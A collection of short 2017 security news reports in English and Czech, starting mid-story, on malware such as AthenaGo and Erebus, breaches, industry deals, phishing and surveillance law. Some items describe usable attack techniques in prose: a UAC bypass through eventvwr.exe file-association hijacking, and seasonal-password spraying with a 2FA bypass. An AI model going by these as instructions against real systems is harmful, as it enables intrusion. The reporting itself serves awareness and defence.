The indictment alleges that Martin stole vast amounts of classified material between 1996 and August 2016, when he was arrested. The files, including ones containing information that could cause serious damage to national security, were found in his home and car.
Investigators said the man had stolen 50 terabytes of files, including secret, top-secret and SCI documents related to the NSA, the Cyber Command (USCYBERCOM), the National Reconnaissance Office (NRO), and the Central Intelligence Agency (CIA).
“The indictment alleges that Martin knew that the stolen documents contained classified information that related to the national defense and that he was never authorized to retain these documents at his residence or in his vehicle,” said the Justice Department.
Martin has been indicted on 20 counts of willful retention of national defense information and he faces up to 10 years in prison for each count.
While the suspect’s attorneys have not made any comments recently, The Washington Post reported that they had previously claimed Martin was taking documents home in an effort to become better in his job and he did not intend to provide any information to foreign governments.
At one point, some reports linked Martin to Shadow Brokers, the group that offered to sell exploits and tools allegedly stolen from the NSA-linked cyber espionage team known as the Equation Group.
AthenaGo RAT Uses Tor2Web for C&C Communication
9.2.2017 securityweek Virus
A newly observed Remote Access Trojan (RAT) targeting Windows systems is using Tor2Web proxies for communication with the command and control (C&C) server, Cisco Talos security researchers warn.
The RAT was written in Go, which is rather unusual for Windows malware, and its author refers to it as Athena, which determined the security researchers to call it AthenaGo. The Trojan, Cisco Talos threat researcher Edmund Brumaghin explains, can download and run additional binaries on the infected system, besides relying on Tor2Web proxies for communication purposes.
The malware is distributed via macro-enabled Word documents, an incresingly popular delivery method that was recently used to drop macOS malware as well. The malicious documents distributing AthenaGo appear to be targeting Portuguese speaking users, as the message that instructs potential victims to enable macros was written in Portuguese.
AthenaGo, one of the few Windows malware families to have been written in Go, comes with two hardcoded domains that it connects to post-infection. Both utilize Tor2Web, a project that allows access to resources on the Tor (The Onion Router) network even if the requesting client system isn’t part of the network.
“Tor2Web servers act as proxies and allow clients to access servers hosting content on Tor without requiring the installation of a local Tor client application. This approach has shown to be increasingly attractive to cybercriminals. The use of Tor2Web and Tor in general allows them to stay anonymous. It also makes it much more difficult to remove malicious content being hosted on servers within Tor, as it is difficult to identify where a Tor server is hosted physically,” the security researcher explains.
During the initial infection process, AthenaGo generates public and private RSA keys that are used to communicate with the C&C server, after which it makes two HTTP HEAD requests to the two hardcoded servers.
The malware includes support for various commands that it executes when receiving instructions from the C&C server: ListDir (for a list of directories on the infected system), ListProcesses (generates a list of processes), KillProcess (to execute the taskkill command against a target process), DownloadFile (to download and save a file), DLRUN (to download a file, save it to %TEMP% and execute it), and RunCMD (to execute system commands on the infected system using Go's os/exec package)
“Malware authors will continue to evolve their attacks as they identify ways to effectively reduce their risk of being caught. This includes relying on C&C infrastructure hosted on Tor, making use of varying levels of encryption to protect the nature and content of network communications with their malware, and limiting their attacks to targeted attacks against specific targets or demographics. AthenaGo is an example of changes in the way malware is being written in an attempt to evade network defenses and successfully compromise target environments,” Cisco Talos’ researcher concludes.
Firms Increasingly Interested in Cyber Insurance: Study
9.2.2017 securityweek Cyber
Companies in the United States, the United Kingdom and Germany are increasingly interested in taking out cyber insurance, according to a new study commissioned by insurance provider Hiscox.
The cyber security readiness study, which involved 3,000 businesses from the three countries, shows that 30% of companies in Germany, 36% in the U.K. and 55% in the U.S. already have cyber insurance. Roughly 30% of the firms that don’t have insurance plan on getting insured in the next 12 months.
The top reasons for taking out cyber insurance are related to the cost of a potential breach and the need for peace of mind, data security concerns, the possibility of customer action, and new data regulations. In roughly one-quarter of cases, cyber insurance is a legal requirement.
Reasons for taking out cyber insurance
More than half of the respondents reported being hit by at least one cyberattack in the last 12 months and the cost of dealing with an incident has been significant. On average, companies in the United States with over 1,000 employees said the largest cyber incident had cost them more than $100,000.
In the case of small U.S. firms, with less than 100 employees, the average cost was roughly $35,000. In the U.K. and Germany, organizations reported spending between approximately $32,000 and $67,000, respectively between $24,000 and $48,000, depending on their size.
The study shows that larger organizations are more likely to be interested in cyber insurance, and financial services is the most insurance-aware sector, with more than half of respondents already having cyber insurance.
Experts pointed out that Germany has been increasingly interested in cyber insurance since the attack on its parliament in 2015. Organizations in Europe are also looking for cyber insurance as a result of the EU’s new data protection regulations, which will take effect in 2018.
Of the companies that do not intend to get cyber insurance, many said the insurance policies are too complicated, they are not exactly sure what cyber insurance is, or they don’t trust the insurer to pay out in the event of an incident.
According to a report published by Allied Market Research (AMR) in December, the global cyber insurance market is expected to generate $14 billion by 2022, which represents a 28 percent increase from 2016.
In the meantime, some security companies have started providing alternatives to the traditional insurance services. San Francisco-based security consulting firm AsTech announced this week that it will be offering a $1 million warranty against breach-related costs if a customer is hacked as a result of a vulnerability that AsTech fails to discover. Endpoint security firm SentinelOne offered similar guarantees last year.
HackerOne Penetrates VC Pockets for $40 Million
9.2.2017 securityweek Security
Bug bounty platform provider HackerOne announced on Wednesday that it has raised $40 million in a Series C financing round led by Dragoneer Investment Group.
The San Francisco-based startup offers a software-as-a-service platform that provides the technology and automation to help organizations run their own vulnerability management and bug bounty programs.
The company says the new funds will be used to invest in technology development, expand market reach, and strengthen its hacker community of more than 100,000 white hat hackers.
HackerOne Logo
The company was co-founded by Alex Rice, the company’s CTO and the man behind Facebook’s bug bounty program, Merijn Terheggen, who serves as CEO, Jobert Abma (tech lead) and Michiel Prins (product lead). HackerOne gained publicity in November 2013 when it announced hosting the Internet Bug Bounty project funded by Microsoft and Facebook.
According to the security startup, more than 38,000 security vulnerabilities have been resolved across more than 700 HackerOne customers, with more than $14 million in bug bounties awarded to date, $7 million of which was awarded in 2016.
In 2016, the U.S. Department of Defense (DoD) selected HackerOne to run the U.S. federal government's first bug bounty challenge, Hack the Pentagon, which HackerOne says resolved more than 138 vulnerabilities discovered by 1,400 hackers.
In October 2016 the DoD announced that it awarded a combined $7 million to HackerOne and Synack for helping the organization’s components launch their own bug bounty initiatives. With $3 million awarded to HackerOne, the company will help the DoD run challenges similar to Hack the Pentagon, while Synack will provide assistance for a private program open only to highly vetted researchers, the DoD said, adding that the private program will focus on the Pentagon’s sensitive IT assets.
Other HackerOne customers include Airbnb, CloudFlare, General Motors, GitHub, New Relic, Nintendo, Qualcomm, Starbucks, Uber and Lufthansa.
“Our customers typically receive their first valid security vulnerability report the same day they challenge our diverse community of hackers to examine their code,” said Marten Mickos, CEO of HackerOne. “There’s no such thing as perfect software and bug bounty programs are the most efficient and cost-effective solution for finding security vulnerabilities in live software.”
NEA, Benchmark and Strategic Investors also participated in the Series C round.
Rockwell Automation Teams With Claroty on Industrial Network Security
9.2.2017 securityweek Security
Rockwell Automation this week announced that it teaming up with industrial cybersecurity startup Claroty to combine their security products and services into future, combined security offerings.
Rockwell, an industrial automation giant with more than 22,000 employees, said that after a competitive review process it selected Claroty for its anomaly-detection software purpose built for industrial network security.
Armed with $32 million in funding through Series A and a Series B rounds, Claroty exited stealth mode in September 2016 to announce a security platform designed to provide “extreme visibility” into Operational Technology (OT) environments and protect critical infrastructure from cyber threats.
Claroty has built a platform that provides broad support for control system manufacturers and employs “high-fidelity models and advanced algorithms” to monitor industrial control systems (ICS) communications and provide security and process integrity alerts. The platform can inspect a large number of industrial control protocols; with support for both open and proprietary protocols from vendors including Siemens, Rockwell Automation/Allen Bradley, Yokogawa, Emerson, GE, Schneider Electric, Mitsubishi, Honeywell, ABB and more.
“More connected control systems combined with the potential for more attacks on those systems have made cybersecurity a top concern in the industrial world,” said Scott Lapcewich, vice president and general manager, Customer Support and Maintenance, Rockwell Automation. “Claroty’s deep-visibility software platform and expertise in industrial security made the company a natural fit for substantial collaboration as we grow our existing portfolio of security service and support offerings.”
“The Claroty platform can detect a bad actor’s activities at any stage, whether they’re trying to gain a foothold on a network, conduct reconnaissance or inflict damage,” said Amir Zilberstein, co-founder and CEO, Claroty. “It also can detect human errors and other process integrity issues, which are often more common than threats from bad-actors. For example, the software monitors for critical asset changes that, if done incorrectly, could result in unexpected downtime. The system also identifies network-configuration issues that could expose a system to outside threats.”
Erebus Ransomware Bypasses UAC for Privilege Elevation
9.2.2017 securityweek Virus
A newly observed ransomware variant is using a technique to bypass User Account Control (UAC) in order to elevate its privileges without displaying a UAC prompt, researchers have discovered.
Dubbed Erebus, the malware appears to be new, though it features the same name as a piece of ransomware that emerged in late September 2016. However, the different characteristics of the two malicious apps suggest that the newly discovered variant is either a completely different malware or a fully rewritten release, BleepingComputer’s Lawrence Abrams notes.
Details on Erebus’ distribution mechanism aren’t available at the moment. What is known, however, is that the malware leverages a UAC bypass technique that was detailed in August last year and which abuses Event Viewer to infect the compromised systems without alerting the user.
For that, the ransomware copies itself to a random named file in the same folder, after which it modifies the Windows registry to hijack the association for the .msc file extension and set it to launch the randomly named Erebus file instead.
Next, the ransomware executes eventvwr.exe (Event Viewer), which will automatically open the eventvwr.msc file, which will attempt to execute mmc.exe. Because the .msc file is no longer associated with mmc.exe, however, the randomly named Erebus executable is launched instead. Moreover, because Event Viewer runs in an elevated mode, the executable will run with the same privileges, which allows it to bypass UAC.
When executed, the malware connects to two different domains to determine the victim’s IP address and the country that they are located in. Next, the malware downloads a TOR client and uses it to connect to its command and control (C&C) server.
The ransomware then proceeds to scan the victim's computer and search for certain file types to encrypt using AES encryption. At the moment, the malware targets around 60 file types, including images and documents. Erebus encrypts the file’s extension using ROT-23, the researcher says.
During encryption, the ransomware also clears the Windows Volume Shadow Copies, in an attempt to prevent users from restoring their files this way. As soon as the encryption process has been completed, the malware drops a ransom note on the Desktop under the name of README.HTML, and then displays it. Additionally, Erebus displays a message box on the desktop, alerting the victim that their files have been encrypted.
The ransom note contains the user’s unique ID, a list of encrypted files, and a button that takes the victim to the TOR payment site. On that site, users are provided with payment instructions. The requested ransom amount is .085 Bitcoin, or around $90 at the moment, which is one of the lowest when compared to other ransomware families out there.
Forcepoint Acquires Skyfence from Imperva
9.2.2017 securityweek Cyber
Forcepoint, the cybersecurity firm created from the $1.9 billion combination of Raytheon and Websense, today announced that it has agreed to acquire the Skyfence business from Imperva.
Skyfence is a player in the hot cloud access security broker (CASB) market, and provides visibility and control over cloud applications such as NetSuite, Office 365, Salesforce, Workday, Dropbox, G Suite and Box.
SKyfence was originally acquired by Imperva in February 2014.
The acquisition by Forcepoint, which is expected to be complete during the first quarter of 2017, will allow Forcepoint to integrate its web security and data loss prevention (DLP) technologies with Skyfence’s technology to provide customers increased visibility, control and security over cloud applications.
The integration also provides Forcepoint customers greater flexibility in deploying web security via on-premise, hybrid and cloud-based solutions, Forcepoint said.
CASBs, which provide security and visibility for companies moving to the cloud, have experienced rapid growth, with several players in the space being acquired by larger enterprise technology firms.
In June 2016, Cisco announced its intention to acquire CloudLock, a privately held cloud CASB based in Waltham, Massachusetts for $293 million in cash and assumed equity awards. In 2015, Microsoft bought Adallom and turned it into its Cloud App Security service launched in April 2016. In 2014 Imperva bought Skyfence; in 2015, Palo Alto Networks bought CirroSecure; and in November 2015 Blue Coat (since acquired by Symantec) bought Elastica.
Forcepoint previously entered into a licensing arrangement Skyfence in March 2015 that enabled Skyfence’s Cloud App Catalog to be integrated into Forcepoint’s web security gateway products.
Skyfence employees will join the Forcepoint team, with the main Skyfence team remaining to be based in Ramat Gan, Israel, the company said.
První středoškolská soutěž ČR v kybernetické bezpečnosti
9.2.2017 SecurityWorld IT
První kolo Středoškolské soutěže ČR v kybernetické bezpečnosti organizované Pracovní skupinou kybernetické bezpečnosti AFCEA a celou řadou státních, akademických a profesní organizací skončilo úspěšně.
Prvního kola se zúčastnilo téměř 1100 osob. Všechna kritéria soutěže splnilo 874 studentů ze 162 středních škol z celé ČR, kteří byli hodnoceni. Do druhého kola soutěže postupuje 567 soutěžících ze všech krajů ČR. Nejvíce zástupců bude mít kraj Jihomoravský, Praha a kraj Vysočina.
První „osvětové“ kolo soutěže ukázalo dobrou všeobecnou znalost studentů v oblasti kybernetické bezpečnosti. Šest studentů získalo plný počet bodů (40) a průměrný bodový výsledek 19,05 bodu všech hodnocených studentů představuje slušný výsledek a zcela jistě velkou motivaci pro následující kolo.
Do soutěže se zapojili studenti z různých typů škol a to nejen technických a gymnázií, ale i studenti z typicky netechnických škol a studijních oborů - např. z uměleckých průmyslovek, zdravotnických škol, hotelových škol atd. Některé školy „vyslaly“ do soutěže jen jednotlivce, jiné celé skupiny o několika desítkách účastníků. Nejvíce studentů v soutěži reprezentovalo Střední školu informatiky, poštovnictví a finančnictví Brno.
Je obtížné hodnotit nejúspěšnější školy, jelikož proměnných je mnoho - počet vyslaných studentů s jejich nejlepším, průměrným a nejhorším výsledkem, počtem postupujících studentů apod., a jsou jimi částečně znevýhodněny školy, které měli menší počet zapojených studentů. Přesto Soutěžní výbor takovéto hodnocení provedl a mezi pěti nejúspěšnějšími školami v České republice se umístili tyto:
Střední průmyslová škola elektrotechnická a Vyšší odborná škola, Pardubice;
Střední průmyslová škola na Proseku, Praha;
Církevní Gymnázium Německého Řádu, Olomouc;
Integrovaná střední škola technická a ekonomická, Sokolov;
SŠ AGC a.s., Teplice.
Součástí hodnocení prvního kola byla i realizace individuálních návštěv jednotlivých škol, osobní předávání diplomů a diskuse se studenty na téma kybernetické bezpečnosti. Členové soutěžního výboru v období od 10. ledna do 3. února uspořádali návštěvu 31 škol, na kterých proběhlo 29 diskusí a přednášek pro více než 1.200 studentů a pedagogů.
První kolo bylo hodnoceno po jednotlivých krajích, a tudíž mělo 14 skupin výherců. Detailní výsledková listina je zveřejněna na stránkách soutěže – www.kybersoutez.cz. Studenti a studentky postupující do druhého kola získali v rámci předaných cen a doprovodných materiálů přístup k celé řadě studijních podkladů o kybernetické bezpečnosti, které do soutěže věnovala řada odborných partnerů.
Důkladnější příprava na druhé kolo, které proběhne v březnu tohoto roku, bude nezbytná, jelikož toto kolo již bude náročnější, více technické a z části v anglickém jazyce. Soutěžící v něm budou usilovat o postup do celorepublikového finále, které proběhne za osobní účasti všech finalistů a jejich doprovodu 1. června 2017 v Brně v rámci mezinárodního veletrhu obranných a bezpečnostních technologií IDET 2017.
HTTPS Security Weakened by AV Products, Middleboxes: Study
8.2.2017 Securityweek Analysis
An increasing number of antiviruses and network appliances intercept TLS connections to gain visibility into encrypted traffic, but in many cases this weakens connection security and introduces vulnerabilities, according to a new study.
The study, focusing on the security impact of HTTPS interception, was carried out last summer by researchers at Mozilla, Google, CloudFlare, the University of Michigan, the University of Illinois Urbana-Champaign, the University of California Berkeley, and the International Computer Science Institute.
Experts have analyzed the TLS handshakes associated with web browsers, security products and malware, and created a set of heuristics designed to allow web servers to detect HTTPS interception and identify the product responsible.
Tests were conducted by deploying these heuristics on Mozilla’s Firefox update servers, the CloudFlare content distribution network (CDN), and some major e-commerce websites. The analysis showed that 4% of the Firefox connections, 6.2% of the e-commerce connections, and nearly 11% of US-based CloudFlare connections were intercepted.
Worryingly, 97% of the Firefox, 54% of the CloudFlare and 32% of the e-commerce connections that were intercepted became less secure. More than 62% of the middlebox connections were weakened and over 58% had severe vulnerabilities.
“Alarmingly, not only did intercepted connections use weaker cryptographic algorithms, but 10–40% advertised support for known-broken ciphers that would allow an active man-in-the-middle attacker to later intercept, downgrade, and decrypt the connection,” researchers said in their report.
The list of middlebox vendors whose products were tested includes A10 Networks, Blue Coat, Barracuda, Check Point, Cisco, Forcepoint, Fortinet, Juniper Networks, Microsoft, Sophos, Untangle and WebTitan. Only the Blue Coat product received an A grade (optimal TLS connection equivalent to modern browsers), while the others received a C (contains known vulnerability) or F (severely broken connection vulnerable to MitM attacks).
The antiviruses analyzed in the study include Windows and Mac products from Avast, AVG, Bitdefender, Bullguard, CYBERsitter, Dr. Web, ESET, G DATA, Kaspersky, KinderGate, Net Nanny, PC Pandora and Qustodio. Only two of the tested Avast products received an A grade.
The researchers said they reported their findings to the affected vendors, and while some of them addressed the issues or they plan on doing so, others ignored them or refused to update their products and shifted responsibility to customers.
The study was published shortly after a member of the Chrome security team and a former Mozilla employee said the only antivirus that is not terrible is the one made by Microsoft.
Two-thirds of Enterprises Usually Breached by White Hat Hackers
8.2.2017 Securityweek Hacking
Analysis of 128 penetration tests conducted in the fourth quarter of 2016 shows that approximately two-thirds of tested companies were successfully breached. This is despite the limited time -- in 89% of cases, less than two weeks -- available to the pentesters compared to the effectively unlimited time available to blackhat attackers.
Rapid7, which was appointed a CVE numbering authority in December 2016, analyzed 128 of the engagements it undertook in the closing months of last year. These involved both internal testing and external testing. In most cases the client company was more interested in external testing (67.2%) over internal testing (21.1%). A few (8.6%) combined both internal and external tests, while a smaller number of tests (3.1%) were neither (code and IoT audits, for example).
External pentests involved testing web sites, phishing, VPNs and so on. Internal tests looked at, for example, network misconfigurations, software, and wifi. Although there were fewer internal tests, states Rapid7, "Overall, penetration testers successfully compromised the target organization through software vulnerabilities or network misconfigurations just over 80% of the time."
The good news, it added, is that "most of the techniques used can be defended against with sensible, widely understood and appropriately tailored network security best practices, including patch management, network segmentation, and regular assessments of the most likely sources of risk in the enterprise."
Pentesters are usually asked to evaluate protection in specific areas. Unsurprisingly, given the increasing scope of regulations, the most frequent request (57% of the companies tested) is to test against the theft of personally identifiable information (PII). This is followed by sensitive internal data at 55.5%. And yet, "despite the recent uptick in online industrial espionage, the surveyed organizations seemed the least interested in specifically protecting copyrighted material [2.3%], digital certificates [3.1%], source code [9.4%], or trade secrets [13.1%]."
It is tempting to infer from this that compliance pressures are focusing defense of PII over purely business secrets. Indeed, Rapid7 director of research, Tod Beardsley, told SecurityWeek, "It was surprising that companies are focusing so much attention on protecting PII, given that real criminals have such a variety of goals, including an increased interest in industrial espionage. We do think that this is due to compliance requirements that mandate PII protections, and therefore, organizations are dedicating their limited resources to making sure their PII story is solid. This is certainly rational, but we worry that organizations are growing too focused on PII protections while criminals are expanding their areas of interest."
The report highlights the value of protecting credentials. "The number one method of obtaining account access," it states, "starts with very simple password guessing; enforcing more machine-generated, rather than human-generated, passwords would go a long way toward defending against this threat, as would more widespread adoption of two-factor authentication."
Rapid7 outlines the methods it uses to 'acquire' client credentials. The most common, and the most successful, is manual guesswork. "Here's a time-saving tip," it comments: "If you know a lot of, or all, usernames, just try <Current season><current year>. People love that password, and according to our survey data, manually guessing patterns like this is successful a surprising (depressing?) fraction of the time."
The two most common methods of defending credentials are account lock-outs and two-factor authentication. However, 32.8% of enterprises did not use lockouts, while for another 42.2% the lockout had no effect or simply delayed the compromise. Rapid7 points out that 14% of the surveyed sites also lacked detection controls. "Combined with a lack of effective lockouts, this is a prescription for inevitable compromise."
2FA authentication is a more successful method of protecting credentials; but is surprisingly rare. "2FA is generally effective in preventing the most common forms of credential compromise, especially when combined with a reasonable detection control like user behavior analytics," says Rapid7.
Once an account is compromised, both pentesters and attackers will seek to locate and use more privileged credentials. Such a process is described in one of several case studies outlined in the report. This client was a technology company. Rapid7 detailed "how good information gathering, coupled with precise password sprays, can ultimately result in going from an unauthenticated nobody on the internet, to an authenticated user on the Domain, and ultimately to a Domain Administrator."
The first step was to search the internet for names or usernames and the potential username format. "This username enumeration technique produced several valid accounts in the domain, which were then re-ran through a brute-force attack against the OWA installation using that favorite password of pen testers, <CurrentSeason><CurrentYear>. This attack produced several valid credentials pairs."
2FA was in use, connected to a VPN endpoint; but Rapid7 by-passed it by changing a compromised e-mail account to one controlled by Rapid7 and using the VPN's self-service enrollment feature. This got the pentesters into the system, and they then scanned the internal hosts until they found an old Group Policy Preference file containing service account credentials vulnerable to trivial decryption. "This user was a Domain Administrator on the network," reports Rapid7, "and therefore Rapid7 had fully compromised this domain upon connecting to the domain controller with this account."
Rapid7 is concerned at the consistency with which it can compromise its clients. There seems to be no difference between small companies with a small attack surface, and large enterprises with a large attack surface. "Over two-thirds of [our] penetration testers remain undetected," it concludes. "Beyond network segmentation, patch management, or any other technical countermeasure, a routine malicious behavior detection strategy that is at least able to catch these frenetic bursts of malicious activity is the best technical protection solution money can buy today."
Macro Malware Comes to macOS
8.2.2017 Securityweek Virus
After becoming a common occurrence on Windows-based computers over the past few years, Malware that abuses macro-enabled Microsoft Office documents to spread is now targeting macOS users too.
Malicious macros in Office documents have been used to spread malware for over a decade, but their use dropped significantly after Microsoft disabled macros by default in Office 2007. A couple of years ago, however, the use of such macros recommenced, as cybercriminals started leveraging various social engineering techniques to trick users into enabling the macros.
Until now, only Windows users were targeted in such attacks, but it appears that actors building malware for Mac systems also decided to adopt the technique recently. According to Patrick Wardle, Director of Research at Synack, such an attack was recently carried out via a Word document named “U.S. Allies and Rivals Digest Trump’s Victory - Carnegie Endowment for International Peace.docm.”
By using clamAV's sigtool to extract embedded macros, the researcher stumbled upon Python code designed to perform a series of checks on the potential victim’s machine before it fetches and executes the malicious payload. As soon as the user opens the document in Word for Mac with macros enabled, the Fisher function is automatically executed.
The Fisher function was observed to decode a base64 chunk of data and then execute it via Python. The Python code, which appears to have been copied from the open-source EmPyre project, checks the machine to make sure LittleSnitch is not running, downloads the second-stage payload (from hxxps[:]//www.securitychecking.org:443/index[.]asp), then RC4 decrypts this payload and executes it.
While EmPyre is a known open-source multi-stage post-exploitation agent “built on cryptologically-secure communications,” it’s unknown what the second-stage payload included, as the file wasn’t available during analysis. While it might have been another EmPyre component, this payload could have been something entirely different as well.
“The second-stage component of Empyre is the persistent agent that affords a remote attacker continuing access to an infected host,” the researcher says. For persistence, cronjob, dylib hijack, launch daemon, or login hook are likely used.
“The persistent component of EmPyre can also be configured to run a wide range of EmPyre modules. These modules allow the attacker to perform a myriad of nefarious actions such as enabling the webcam, dumping the keychain, and accessing a user's browser history,” the researcher notes.
The IP associated with the securitychecking(.)org website that hosts the malicious payload appears to be geolocated in Russia and was previously associated with phishing.
While the malware used in this attack isn’t particularly advanced, as it relies on user interaction to open the malicious document in Microsoft Word and enable macros, it also uses an open-source implant that is likely to be easily detected. However, the use of social engineering is noteworthy, especially since it exploits the weakest link in the chain, namely the human element.
“And moreover, since macros are 'legitimate' functionality (vs. say a memory corruption vulnerability), the malware's infection vector doesn't have to worry about crashing the system nor being 'patched' out,” the researcher concludes.
Česká spořitelna varuje: kyberútočníci využívají nový trik s adresou
8.2.2017 Živě.cz Phishing
S phishingem se v posledních týdnech roztrhl pytel. Před útoky na klienty varovala Fio banka, ČSOB, Alza, ale také Google v souvislosti s Gmailem. Nově se přidala i Česká spořitelna, která zaznamenala novou vlnu útoků, v níž útočníci využívají novou metody pro zmatení uživatelů.
Vše opět stojí na e-mailu, který uživatele vyzývá k zobrazení důležité zprávy v internetovém bankovnictví. Po kliknutí na odkaz jej přenese na podvodnou přihlašovací stránku tvářící se jako korektní webová správa účtu. Zadané údaje ale samozřejmě míří do databáze útočníků. Tentokrát se snaží vylákat také autorizační kód doručený formou SMS.
Uživateli nejdřív dojde e-mail, v němž najde odkaz na důležitou zprávu v internetovém bankovnictví • Následně je uživatel přesměrován na podvodnou stránku, která se vydává za internetové bankovnictví (foto: Česká spořitelna)
Novinkou je využití finty, která má zamaskovat adresu falešného webu využitím tzv. Data URI, kdy lze do adresy zapsat kus zdrojového kódu. Díky tomu může adresní řádek obsahovat i známý text servis24.cz, uživatele by však měla varovat především absence zabezpečeného připojení, které je v prohlížečích symbolizováno ikonou zeleného zámku.
Česká spořitelna vyzývá k přeposílání podvodných e-mailů na adresu phishing@csas.cz a zároveň doporučuje ihned kontaktovat zákaznickou linku v případě, že již došlo k zadání údajů do falešného formuláře.
Autor známého doplňku pro Kodi si chtěl vyřizovat účty, a tak do něj umístil DDoS
8.2.2017 Živě.cz Hacking
Scéna okolo populárního přehrávače Kodi v minulých dnech zažila nepříjemnou aféru. Autor jednoho z populárních doplňků Exodus, který slouží ke streamování filmů a seriálů z internetu, si chtěl pomocí obrovské základny uživatelů vyřizovat účty se svými kritiky a do kódu doplňku zakomponoval pokus o DDoS.
Multimediální přehrávač Kodi na Android TV
Podle TorrentFreaku byl autor Exodu, který na internetu vystupoval pod přezdívkou Lambda, ve sporu s jistými kritiky, kteří chtěli odhalit jeho skutečnou identitu. Toho se Lambda jako autor pirátského doplňku obával, a tak v rámci aktualizace umístil do kódu Exodu několik řádů s příkazy, které cyklicky načítaly webové adresy, které patřily jeho nepřátelům.
Kód v Pythonu, který ve smyčce prováděl HTTP GET požadavky. Při velkém počtu uživatelů doplňku autor doufal, že způsobí neplechu a zahltí webový server.
Zvídavým uživatelům však jen tak něco neunikne, a tak se brzy začali ptát, proč se doplněk snaží na pozadí otevřít asi čtyřicet webových spojení pokaždé, když skrze něj začnou cokoliv streamovat.
Lambda se nakonec musel přiznat, že chtěl poškodit své kritiky a funkci upravil jako volitelnou pro své podporovatele. Zašel však příliš daleko, znedůvěryhodnil celou scénu a přišel o účet v katalogu s doplňky. Nakonec Kodi fakticky opustil.
Domácí kino Kodi na Android TV
Celý případ připomněl, že s instalací jakéhokoliv kódu třetí strany musíme vždy myslet na to, že jej může nedůvěryhodný autor zneužít. Nemusí se přitom vždy jednat o malware, který by nám měl citelně ublížit, ale třeba právě o to, že se nás pokusí zapojit do útoku typu DDoS jako v tomto případě.
Sledování internetu vojenským zpravodajstvím: posun správným směrem
8.2.2017 Lupa.cz BigBrother
Poslanci dnes na zasedání výboru pro bezpečnost přidali k novele zákona o Vojenském zpravodajství několik důležitých návrhů mířících pozitivním směrem.
K novele zákona o Vojenském zpravodajství (VOZ) jsem se už párkrát vyjadřoval a není tedy asi nutné připomínat, že nejsem velkým příznivcem této normy. Osobně si myslím, že umělé rozdělení na kybernetickou bezpečnost a kybernetickou obranu a také propojení tohoto tématu se zpravodajskou službou je velmi špatný nápad. Razantně jsem vystupoval i proti tomu, aby VOZ mohla technicky získávat veškerá data internetového provozu. Pojistka v zákonu ve formě prohlášení, že se VOZ obsahem nebude zbývat, mi přišla slabá. Stejně tak mi vadí, že by k diskusi o nasazení příslušné techniky nebyli přizváni odborníci mimo okruh VOZ či ministerstva obrany.
Dnešní zasedání výboru pro bezpečnost přineslo mírně příznivé zprávy. Za prvé, navrhovaný pozměňovací návrh říká, že VOZ bude moci získávat pouze metadata. Přeloženo do obecné češtiny to znamená, že VOZ „uvidí“ pouze hlavičky (obálky) zpráv a nikoliv obsah zpráv. V praxi to znamená, že například uvidí, že si dva mailové servery předávaly nějakou zprávu, ale nebudou vědět od koho komu a co v ní bylo. Budou také případně moci vidět, že z nějaké konkrétní IP adresy kdosi přistupoval na web např. Seznamu, CZ.NICu či třeba na servery s obsahem pro dospělé.
Dále čtěte: Přišlo hacknutí ministerstva zahraničí jako na zavolanou?
Nebudou ale mít 100% jistotu kdo a co tam stahoval. Daná IP adresa může sloužit firmě, nějaké domácnosti, ale bohužel i pouze konkrétnímu jednotlivci. Dále tato změna také znamená, že je vyloučeno nasazení aktivního zařízení, přes které by protékal veškerý provoz, i pasivního zařízení, které by odposlouchávalo veškerou komunikaci nějaké linky. V praxi by to pravděpodobně znamenalo, že by ISP ze svého routeru posílal informace o provozu pomoci NetFlow či sFlow, což je relativně běžná procedura, která se pro monitoring sítě používá. Ale je pravdou, že pro některé ISP s routery bez této funkcionality to může být určitá technická komplikace.
Druhá změna se týká zřízení poradního orgánu, jenž by měl zahrnovat i odborníky z řad operátorů, a který by vydával odborná stanoviska k navrhovanému nasazení techniky. Trochu tomuto ustanovení vyčítám, že není lépe řečeno, kdo přesně bude členem tohoto orgánu. Praxe by to sice vyjasnila, ale byl bych radši, kdyby tam bylo jasně napsáno, že tam budou například i zástupci národního i vládního CERT týmu apod.
Třetí změnou je vydávání každoroční zprávy o učiněných opatřeních. Opět to je pochopitelně dobrý posun. I když je trochu škoda, že navrhovaná úprava je v této věci velmi stručná. Považoval bych za lepší, kdyby zmiňovaná zpráva obsahovala i výčet závažných útoků, jež daná technika pomohla detekovat či eliminovat.
Brand
Každopádně závěr výboru vítám, pořád si sice myslím, že by bylo lepší kybernetickou obranu a bezpečnost této země zajistit jinými mechanismy, ale tento pozměňovací návrh novelu jednoznačně zlepšuje.
Spam je zpět, je ho nejvíc za 7 let, každý desátý obsahuje malware
8.2.2017 Root.cz Spam
Každou sekundu je na světě odesláno 3500 nevyžádaných mailů, každý desátý z nich je škodlivý. Spam dnes představuje více než 65 procent veškeré odeslané pošty a hodnoty se tak dostávají na úroveň roku 2010.
Objem rozesílaného spamu opět roste. Po relativně klidných letech se jeho objem zvýšil několikanásobně. Zatímco během roku 2015 se každou sekundu poslalo průměrně 500 spamů, nyní se jich posílá 3500. Ukazuje to alespoň zpráva Cisco 2017 Annual Cybersecurity Report, která potvrzuje informace týmu Cisco Talos ze září 2016.
Objem spamu opět roste
Podle ní je v současnosti jasně vidět snaha útočníků o co nejvyšší zisk. Taktiky kybernetických útočníků se dnes podobají obchodním modelům s cílem maximalizovat zisk. A využívají nejen nových možností, ale spoléhají se i na staré finty, jako je spam, který dnes představuje 65 % všech odeslaných mailů, píše se ve zprávě. Objemově se tak spam dostává na sedm let staré hodnoty z roku 2010.
Mezi 8 a 10 procenty spamu je navíc přímo infikováno malware, útočníci jej přidávají jako přílohu. Tímto způsobem se pak šíří nejrůznější škodlivý kód, na vzestupu je software zobrazující nevyžádané reklamy.
Nebezpečnější nevyžádané reklamy
Škodlivý software zobrazující nevyžádanou reklamu (tzv. adware) je na vzestupu, navíc nebezpečnější než dříve. Kybernetičtí útočníci totiž začali adware využívat jako první krok k infikování systémů pokročilejším typem malwaru. Jedním z příkladů může být malware DNSChanger, který umožní útočníkovi kontrolovat síťový provoz.
DNSChanger se přitom vyskytuje pouze v zařízeních, která již dříve byla infikována adwarem. Jeho škodlivost je nicméně velmi podceňována a výzkumníci zjistili, že v 75 % organizací se adware vyskytuje minimálně na jednom zařízení. Zkoumáno bylo 130 organizací různých velikostí a napříč obory.
Útočníci také využívají častěji internetovou reklamu, prostřednictvím které šíří škodlivý software (tzv. malvertisting). Malvertising totiž umožňuje útočníkům rychle rozšířit počet potenciálních obětí. Při takto rozsáhlé kampani navíc dokážou rychle přepínat mezi jednotlivými servery, které šíří malware. Tímto způsobem snižují riziko svého odhalení. Například prostřednictvím kampaně ShadowGate proběhl útok na miliony uživatelů po celém světě.
